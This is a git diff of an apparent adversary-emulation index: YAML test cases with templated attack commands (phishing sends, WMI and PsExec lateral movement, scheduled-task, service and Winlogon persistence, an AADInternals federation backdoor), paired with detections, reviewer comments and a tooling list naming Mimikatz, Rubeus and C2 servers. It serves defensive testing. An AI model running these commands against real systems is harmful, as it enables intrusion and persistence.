for instances where the logins occur from comparatively anomalous geolocations +controls: +- SIEM +- IdP +metadata: + id: 609515fe-24e0-4bc2-a069-a3d815e68ec2 + tid: T1078 + tactic: TA0001 + x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2 + isv: 1 
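Review bot: A password spray is many accounts at low volume per account, so "a large number of authentication attempts originating from a single source" misses the defining feature and is defeated by rotating sources; the detect line should key on the number of distinct usernames failing from one source or ASN below the lockout threshold, e.g. `- Alert when one source/ASN produces failed authentications for many distinct accounts within a window, regardless of per-account count`. `Portal protected with secure MFA solution` is not a block for this technique: the password is validated before the MFA step, so the spray still confirms valid credentials and only the follow-on login is stopped; smart lockout or rate limiting at the IdP (already the second block line) is the actual block. The description could note the post-spray pivot the MFA line is really about so the two are not conflated in scoring.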
diff --git a/fs-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml b/fs-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml new file mode 100644 index 0000000..a4d1696 --- /dev/null +++ b/fs-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml @@ -0,0 +1,17 @@ +name: Attachment - Zipped macro +description: Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email. +platforms: +guidance: +- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }} +block: +- Malicious email blocked/quarantined or attachment inside email stripped by email gateway +detect: +- Malicious email alerted on by email gateway +controls: +- Mail Gateway +metadata: + id: 97f1da56-79a3-4181-a491-8de9f93b05af + tid: T1566.001 + tactic: TA0001 + x_vectr_id: 97f1da56-79a3-4181-a491-8de9f93b05af + isv: 1 diff --git a/fs-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml b/fs-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml new file mode 100644 index 0000000..daf292b --- /dev/null +++ b/fs-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml 
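Review bot: The placeholders in `Send-MailMessage -Subject {{ subject }} -Body {{ body }}` are unquoted, so any subject or body containing a space is split into extra arguments and the command fails; quote them as `-Subject "{{ subject }}" -Body "{{ body }}"` (same for `-To`/`-From`). `Send-MailMessage` is also marked obsolete by Microsoft (it still runs but warns in PowerShell 7 and does not support modern auth), which is worth a note for reproducibility. The block line should distinguish gateways that inspect ZIP contents from those that only match the outer attachment type, and note that a password-protected archive bypasses content inspection entirely, so the test should record which variant was sent.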
@@ -0,0 +1,16 @@
+name: Prompt a user with multiple MFA requests
+description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+platforms:
+guidance:
+block:
+- Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+detect:
+- Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+controls:
+- IdP
+metadata:
+ id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ tid: T1621
+ tactic: TA0006
+ x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ isv: 1
diff --git a/fs-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml b/fs-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
new file mode 100644
index 0000000..1eae23d
--- /dev/null
+++ b/fs-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
@@ -0,0 +1,17 @@
+name: Attachment - ISO
+description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+ id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ isv: 1
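Review bot: The block line covers only anomalous-login blocking, but the control that actually defeats push fatigue is number matching or removing simple-approve push altogether (Microsoft Authenticator enforces number matching by default since 2023; Okta and Duo have equivalents), so a stray approval cannot complete a sign-in. Add `- Push MFA requires number matching or is replaced by a phishing-resistant method (FIDO2/passkey)`. On detection, the sign-in log that records the prompts also records their result, so baselining on denied/declined prompts per user (e.g. an "MFA denied" result code) is less noisy than total prompt volume and directly reflects the user resisting the attack. `guidance:` is empty; a note that the operator needs the valid password and triggers repeated sign-ins from a scripted client would make the test reproducible.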
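Review bot: In the ISO hunk the block line is copied from a link-based phishing entry: it says `link inside email rewritten/stripped`, but this technique sends an ISO attachment, so it should read `attachment stripped` as the sibling zipped-macro entry does. The description's claim that ISO bypasses Mark-of-the-Web needs a caveat: since the November 2022 Windows updates (CVE-2022-41091) MOTW is propagated to files inside mounted ISO images, so the bypass only holds on unpatched hosts and the test should record the target's patch level, e.g. `ISO files could be used to bypass mark-of-the-web restrictions on hosts missing the November 2022 updates (CVE-2022-41091)`. The unquoted `{{ subject }}`/`{{ body }}` placeholders in the `Send-MailMessage` line will break on spaces and should be quoted.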
diff --git a/fs-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml b/fs-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml new file mode 100644 index 0000000..775b96d --- /dev/null +++ b/fs-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml @@ -0,0 +1,20 @@ +name: Lateral Movement via RDP +description: Perform an interactive logons to a Windows system via RDP +platforms: +- windows +guidance: +- CMD> mstsc /v:{{ target }} +block: +- Host-based firewalls prevent direct communications over common ports/protocols +detect: +- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal +controls: +- SIEM +- Identity Threat Protection +- Hardening +metadata: + id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + tid: T1021.001 + tactic: TA0008 + x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + isv: 1 diff --git a/fs-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml b/fs-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml new file mode 100644 index 0000000..807596c --- /dev/null +++ b/fs-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml 
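Review bot: The detect line should name the RDP-specific fields rather than generic 4624/4648: an RDP session is 4624 with Logon Type 10 (RemoteInteractive) on the target, preceded by `Microsoft-Windows-TerminalServices-RemoteConnectionManager` Event ID 1149 and `LocalSessionManager` 21/25 for session start/reconnect, and filtering on those keeps type 3 network logons out of the baseline. Change the parenthetical to `(Event ID 4624 LogonType 10, 4648; TerminalServices-RemoteConnectionManager 1149)`. Beyond host firewalls, Network Level Authentication and Restricted Admin / Remote Credential Guard limit what a compromised session yields and belong under block, and the `Identity Threat Protection` control could be made concrete as a tiering rule (no admin accounts RDPing into lower-tier hosts). The description has `an interactive logons`; it should be `an interactive logon`.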
@@ -0,0 +1,23 @@ +name: Lateral Movement via WMI +description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system +platforms: +- windows +guidance: +- CMD> wmic /node:"{{ target }}" process call create "{{ command }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +- Host-based firewalls prevent direct communications over common ports/protocols +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal +controls: +- Endpoint Protection +- SIEM +- Identity Threat Protection +- Hardening +metadata: + id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + tid: T1021.003 + tactic: TA0008 + x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + isv: 1 diff --git a/fs-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml b/fs-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml new file mode 100644 index 0000000..508dc52 --- /dev/null +++ b/fs-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml 
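Review bot: The process-creation signal for WMI lateral movement is specific and should be stated: on the target, the spawned `{{ command }}` has `WmiPrvSE.exe` as its parent (Sysmon Event ID 1 / 4688 ParentProcessName), which is near-unique to remote WMI execution and far higher-fidelity than the generic "suspicious process" line. Add `- On the target, process created with parent WmiPrvSE.exe (Sysmon 1 / 4688) correlated with a network logon (4624 type 3) from the source`. `wmic.exe` is deprecated and removed from recent Windows 11 builds; give `Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="{{ command }}"} -ComputerName {{ target }}` as an alternative so the test stays reproducible. The host-firewall block line could be made specific to the `Windows Management Instrumentation (WMI-In)`/DCOM rules, which are what actually gate this path.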
@@ -0,0 +1,24 @@
+name: Lateral Movement via PsExec
+description: Move to another system by creating a service remotely via Sysinternals PsExec
+platforms:
+- windows
+guidance:
+- CMD> psexec -s \{{ target }} {{ command }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+- Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+ id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+ tid: T1021.002
+ tactic: TA0008
+ x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+ isv: 1
diff --git a/fs-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml b/fs-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
new file mode 100644
index 0000000..c373b4f
--- /dev/null
+++ b/fs-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
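Review bot: The `guidance` line shows `\{{ target }}` with a single backslash, whereas PsExec takes a UNC-style `\\computer` argument and the remote-copy entry in this same commit does write `\\{{ target }}`; this looks like a dropped character unless it was lost when the diff was rendered. The `detect` bullets repeat the generic RDP/WMI text even though this technique has a very specific indicator on the target: the service-installation event (Security 4697 / System 7045) carrying PsExec's default `PSEXESVC` service name with an image path under the ADMIN$ share. Consider adding `- Service installation events on the target (Event ID 4697/7045), especially with the default PSEXESVC service name or a binary path under ADMIN$`. The third `block` item (SCM DACL) is a good, specific control; `Hardening` in `controls` presumably refers to it.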
@@ -0,0 +1,20 @@
+name: Remote .exe copy
+description: Copy an .exe payload to a temp folder on the remote target
+platforms:
+guidance:
+- cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- Antivirus
+- SIEM
+metadata:
+ id: b74ff4c5-eebf-466b-af85-341b19c4c748
+ tid: T1570
+ tactic: TA0008
+ x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748
+ isv: 1
diff --git a/fs-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml b/fs-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
new file mode 100644
index 0000000..a58486f
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
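Review bot: `platforms:` is left empty here while every other technique file in this commit lists a platform; the `copy` command and UNC path are Windows-only, so the key should presumably read `platforms:` / `- windows`, otherwise tooling that filters the index by platform may silently drop this entry. The prompt prefix is `cmd>` here and in the scheduled-task entry but `CMD>` everywhere else — pick one. A file copy over SMB produces no process-execution telemetry on the target, so the first `detect` bullet does not really apply; a more specific signal is share-access auditing, e.g. `- File share access events (Event ID 5145, requires Audit Detailed File Share) against ADMIN$/C$ from an unexpected source host`.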
@@ -0,0 +1,23 @@
+name: Register a new device in Azure AD
+description: Register a new device in Azure AD
+platforms:
+- azuread
+guidance:
+- PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+block:
+- 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+detect:
+- Detect anomalous device registration events by using Azure audit logs
+controls:
+- SIEM
+- Hardening
+metadata:
+ id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+ tid: T1098.005
+ tactic: TA0003
+ x_tools:
+ - AADInternals
+ x_references:
+ - htpts://aadinternals.nom/post/prt/
+ x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+ isv: 1
diff --git a/fs-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml b/fs-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
new file mode 100644
index 0000000..cd00901
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
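Review bot: The cmdlet in `guidance` is spelled `Join-AADIntDeviceToAurzeAD`; the AADInternals cmdlet is `Join-AADIntDeviceToAzureAD`, so the command fails as written. The `x_references` entry `htpts://aadinternals.nom/post/prt/` has a mangled scheme and TLD and presumably should be `https://aadinternals.com/post/prt/`. `description` merely repeats `name`; it should state the risk the test exercises, e.g. `Register a rogue device object in the tenant; a registered device can obtain device-bound tokens and satisfy device-based Conditional Access policies`. The `detect` bullet would be more actionable if it named the audit activity to look for (for instance `Add device` in the Entra audit log) and the baseline to compare against (registering principal, device OS/type, source IP).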
@@ -0,0 +1,20 @@
+name: Persist via new scheduled task
+description: Persist on a system by creating a new scheduled task
+platforms:
+- windows
+guidance:
+- cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 20a6dace-d801-42f5-b659-6cf91e39d273
+ tid: T1053.005
+ tactic: TA0003
+ x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+ isv: 1
diff --git a/fs-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml b/fs-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
new file mode 100644
index 0000000..d43b8c9
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
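Review bot: The `detect` bullet cites Event ID 4698 without saying that it is only emitted when the `Audit Other Object Access Events` subcategory is enabled, which is off by default, so a SIEM relying on it may see nothing during the test; the bullet should state that prerequisite, or also reference the `Microsoft-Windows-TaskScheduler/Operational` log (Event ID 106, task registered), which does not depend on the Security audit policy though that log itself must be enabled. The same gap exists in the Windows-service entry in this commit, where 4697 depends on the `Audit Security System Extension` subcategory while System log 7045 is written unconditionally. Suggested addition here: `- Event ID 4698 requires the Audit Other Object Access Events subcategory; TaskScheduler/Operational Event ID 106 is an alternative source`. Minor: the prompt prefix `cmd>` is lowercase here but `CMD>` in most other entries.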
@@ -0,0 +1,20 @@
+name: Persist via new Windows service
+description: Persist on a system by creating a new service
+platforms:
+- windows
+guidance:
+- CMD> sc create {{ service_name }} binPath= "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+ tid: T1543.003
+ tactic: TA0003
+ x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+ isv: 1
diff --git a/fs-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml b/fs-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
new file mode 100644
index 0000000..a323aaa
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
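Review bot: The `description` should make the risk explicit: the `guidance` command `sc create {{ service_name }} binPath= "{{ command }}"` passes no `obj=` argument, so the resulting service runs as LocalSystem, which is why a new-service event deserves an alert rather than just a baseline comparison; suggested wording `Persist on a system by creating a new service, which runs as LocalSystem unless an account is specified`. The `detect` bullet keys only on rarity of the command text; the service image path is a stronger and cheaper signal, e.g. add `- Alert on new services whose binary path is outside %SystemRoot% / Program Files or invokes a script interpreter`. Minor wording: `services creation events` should read `service creation events`.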
@@ -0,0 +1,20 @@
+name: Persist via Registry Winlogon Shell
+description: Run a payload during user login by setting a Registry Winlogon key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+ tid: T1547.004
+ tactic: TA0003
+ x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+ isv: 1
diff --git a/fs-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml b/fs-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
new file mode 100644
index 0000000..0a122f8
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
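Review bot: The `detect` bullet cites Event ID 4656 (a handle to an object was requested) for catching the change, but the event that records the value write is 4657 (`A registry value was modified`), and 4656 alone fires on every open of the key and is very noisy; the bullet should reference 4657 scoped to the Winlogon key (or Sysmon Event ID 13 as a lower-friction alternative). The same sentence has a grammar slip: `Trigger an alert when modification are made the Registry` should read `Trigger an alert when modifications are made to the Registry`. Separately, the `guidance` line passes the value after `/f` with no `/d` data switch, so the command looks malformed and should be re-checked before the index is used; it is also worth a note that overwriting `Shell` replaces the default `explorer.exe` for every user on the test host, so the test should be run on a disposable machine or the original value recorded first.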
@@ -0,0 +1,23 @@
+name: Configure a custom federated domain
+description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+platforms:
+- azuread
+guidance:
+- PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+block:
+- ''
+detect:
+- Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+- https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+controls:
+- SIEM
+metadata:
+ id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+ tid: T1484.002
+ tactic: TA0003
+ x_tools:
+ - AADInternals
+ x_references:
+ - https://o365blog.com/post/aadbackdoor/
+ x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+ isv: 1
diff --git a/h-index-2024/CHANGELOG.md b/h-index-2024/CHANGELOG.md
new file mode 100644
index 0000000..b5315fa
--- /dev/null
+++ b/h-index-2024/CHANGELOG.md
@@ -0,0 +1,4 @@
+# v1.0 (January 2024)
+
+- Initial release
+
diff --git a/h-index-2024/REQUIREMENTS.md b/h-index-2024/REQUIREMENTS.md
new file mode 100644
index 0000000..131ec9c
--- /dev/null
+++ b/h-index-2024/REQUIREMENTS.md
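Review bot: `block` holds only an empty string `''`, so this entry ships with no preventive guidance even though its detection side is filled in; the preventive control is role scoping, since only highly privileged directory roles (Global Administrator and, as far as I recall, Domain Name Administrator) can change domain authentication, so the bullet could read `- Keep the roles able to manage domain names/federation PIM-gated with approval and alerting on activation; review federation settings for all verified domains on a schedule`, with `Hardening` and `Identity Threat Protection` added to `controls` accordingly. `SEIM` in the first `detect` bullet is a typo for `SIEM`. The bare inversecos URL in the second `detect` bullet is a reference, not a detection, and belongs under `x_references` next to the o365blog link.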
@@ -0,0 +1,38 @@
+# Infrastructure
+
+- Mail server/relay to send emails
+- Proxy/VPN
+- Proxy/VPN in non-standard geolocation
+- HTTP/S file hosting server
+- Command-and-control server(s) with HTTPS and HTTP channels
+- Accounts for : Cloud storage provider (exfil, sharing), remote assistance service (if applicable)
+- Domain(s) and certificate(s) for infrastructure
+
+## Payloads
+
+|#|Test Case|Payload|Notes|
+|---|---|---|---|
+|1|Attachment - ISO|ISO||
+|2|Attachment - Macro|Macro-enabled Office document||
+|3|Link - Zipped DLL via sharing|DLL in zip||
+|4|DLL execution using Rundll32|DLL||
+|5|Sideload a DLL into a legitimate application|DLL|can be shared with #4 as long as exported functions are as expected|
+|6|Load known-abusable kernel driver|Windows driver|refer to notebook for example drivers + hashes|
+|7|Register Security Service Provider (SSP) in LSASS|SSP DLL|refer to notebook for instructions on creating DLL|
+|8||Sensitive data|Use dlptest.com for sample data|
+|9|Macro - Remote Template|Office document that loads remotely-hosted macro-enabled template||
+
+
+# Tools/Scripts
+
+- Remote assistance tool such as TeamViewer, GoTo, or AnyConnect
+- Net Scan : https://www.softperfect.com/products/networkscanner/
+- SharpHound : https://github.com/BloodHoundAD/SharpHound
+- SharpDPAPI : https://github.com/GhostPack/SharpDPAPI
+- Rubeus : https://github.com/GhostPack/Rubeus
+- Mimikatz : https://github.com/gentilkiwi/mimikatz
+- Nanodump : https://github.com/fortra/nanodump
+- ProcDump : https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+- File encryptor : https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+- AADInternals : https://github.com/Gerenios/AADInternals
+
diff --git a/h-index-2024/h-index-2024-v1.0-layer.json b/h-index-2024/h-index-2024-v1.0-layer.json
new file mode 100644
index 0000000..f8e8020
--- /dev/null
+++ b/h-index-2024/h-index-2024-v1.0-layer.json
@@ -0,0 +1,3168 @@ +{ + "description": "Health Threat Simulation Index 2024 v1.0", + "domain": "enterprise-attack", + "layout": { + "layout": "flat" + }, + "name": "Health Threat Simulation Index 2024 v1.0", + "selectSubtechniquesWithParent": false, + "selectTechniquesAcrossTactics": false, + "techniques": [ + { + "enabled": false, + "techniqueID": "T1001" + }, + { + "enabled": false, + "techniqueID": "T1001.001" + }, + { + "enabled": false, + "techniqueID": "T1001.002" + }, + { + "enabled": false, + "techniqueID": "T1001.003" + }, + { + "enabled": false, + "techniqueID": "T1002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "enabled": false, + "techniqueID": "T1003.002" + }, + { + "enabled": false, + "techniqueID": "T1003.003" + }, + { + "enabled": false, + "techniqueID": "T1003.004" + }, + { + "enabled": false, + "techniqueID": "T1003.005" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.006" + }, + { + "enabled": false, + "techniqueID": "T1003.007" + }, + { + "enabled": false, + "techniqueID": "T1003.008" + }, + { + "enabled": false, + "techniqueID": "T1004" + }, + { + "enabled": false, + "techniqueID": "T1005" + }, + { + "enabled": false, + "techniqueID": "T1006" + }, + { + "enabled": false, + "techniqueID": "T1007" + }, + { + "enabled": false, + "techniqueID": "T1008" + }, + { + "enabled": false, + "techniqueID": "T1009" + }, + { + "enabled": false, + "techniqueID": "T1010" + }, + { + "enabled": false, + "techniqueID": "T1011" + }, + { + "enabled": false, + "techniqueID": "T1011.001" + }, + { + "enabled": false, + "techniqueID": "T1012" + }, + { + "enabled": false, 
+ "techniqueID": "T1013" + }, + { + "color": "#7a34eb", + "techniqueID": "T1014" + }, + { + "enabled": false, + "techniqueID": "T1015" + }, + { + "enabled": false, + "techniqueID": "T1016" + }, + { + "enabled": false, + "techniqueID": "T1016.001" + }, + { + "enabled": false, + "techniqueID": "T1016.002" + }, + { + "enabled": false, + "techniqueID": "T1017" + }, + { + "color": "#7a34eb", + "techniqueID": "T1018" + }, + { + "enabled": false, + "techniqueID": "T1019" + }, + { + "enabled": false, + "techniqueID": "T1020" + }, + { + "enabled": false, + "techniqueID": "T1020.001" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.003" + }, + { + "enabled": false, + "techniqueID": "T1021.004" + }, + { + "enabled": false, + "techniqueID": "T1021.005" + }, + { + "enabled": false, + "techniqueID": "T1021.006" + }, + { + "enabled": false, + "techniqueID": "T1021.007" + }, + { + "enabled": false, + "techniqueID": "T1021.008" + }, + { + "enabled": false, + "techniqueID": "T1022" + }, + { + "enabled": false, + "techniqueID": "T1023" + }, + { + "enabled": false, + "techniqueID": "T1024" + }, + { + "enabled": false, + "techniqueID": "T1025" + }, + { + "enabled": false, + "techniqueID": "T1026" + }, + { + "enabled": false, + "techniqueID": "T1027" + }, + { + "enabled": false, + "techniqueID": "T1027.001" + }, + { + "enabled": false, + "techniqueID": "T1027.002" + }, + { + "enabled": false, + "techniqueID": "T1027.003" + }, + { + "enabled": false, + "techniqueID": "T1027.004" + }, + { + "enabled": false, + "techniqueID": "T1027.005" + }, + { + "enabled": false, + "techniqueID": "T1027.006" + }, + { + "enabled": false, + "techniqueID": "T1027.007" + }, + { + "enabled": false, 
+ "techniqueID": "T1027.008" + }, + { + "enabled": false, + "techniqueID": "T1027.009" + }, + { + "enabled": false, + "techniqueID": "T1027.010" + }, + { + "enabled": false, + "techniqueID": "T1027.011" + }, + { + "enabled": false, + "techniqueID": "T1027.012" + }, + { + "enabled": false, + "techniqueID": "T1028" + }, + { + "enabled": false, + "techniqueID": "T1029" + }, + { + "enabled": false, + "techniqueID": "T1030" + }, + { + "enabled": false, + "techniqueID": "T1031" + }, + { + "enabled": false, + "techniqueID": "T1032" + }, + { + "enabled": false, + "techniqueID": "T1033" + }, + { + "enabled": false, + "techniqueID": "T1034" + }, + { + "enabled": false, + "techniqueID": "T1035" + }, + { + "enabled": false, + "techniqueID": "T1036" + }, + { + "enabled": false, + "techniqueID": "T1036.001" + }, + { + "enabled": false, + "techniqueID": "T1036.002" + }, + { + "enabled": false, + "techniqueID": "T1036.003" + }, + { + "enabled": false, + "techniqueID": "T1036.004" + }, + { + "enabled": false, + "techniqueID": "T1036.005" + }, + { + "enabled": false, + "techniqueID": "T1036.006" + }, + { + "enabled": false, + "techniqueID": "T1036.007" + }, + { + "enabled": false, + "techniqueID": "T1036.008" + }, + { + "enabled": false, + "techniqueID": "T1036.009" + }, + { + "enabled": false, + "techniqueID": "T1037" + }, + { + "enabled": false, + "techniqueID": "T1037.001" + }, + { + "enabled": false, + "techniqueID": "T1037.002" + }, + { + "enabled": false, + "techniqueID": "T1037.003" + }, + { + "enabled": false, + "techniqueID": "T1037.004" + }, + { + "enabled": false, + "techniqueID": "T1037.005" + }, + { + "enabled": false, + "techniqueID": "T1038" + }, + { + "enabled": false, + "techniqueID": "T1039" + }, + { + "enabled": false, + "techniqueID": "T1040" + }, + { + "color": "#7a34eb", + "techniqueID": "T1041" + }, + { + "enabled": false, + "techniqueID": "T1042" + }, + { + "enabled": false, + "techniqueID": "T1043" + }, + { + "enabled": false, + "techniqueID": "T1044" + }, + 
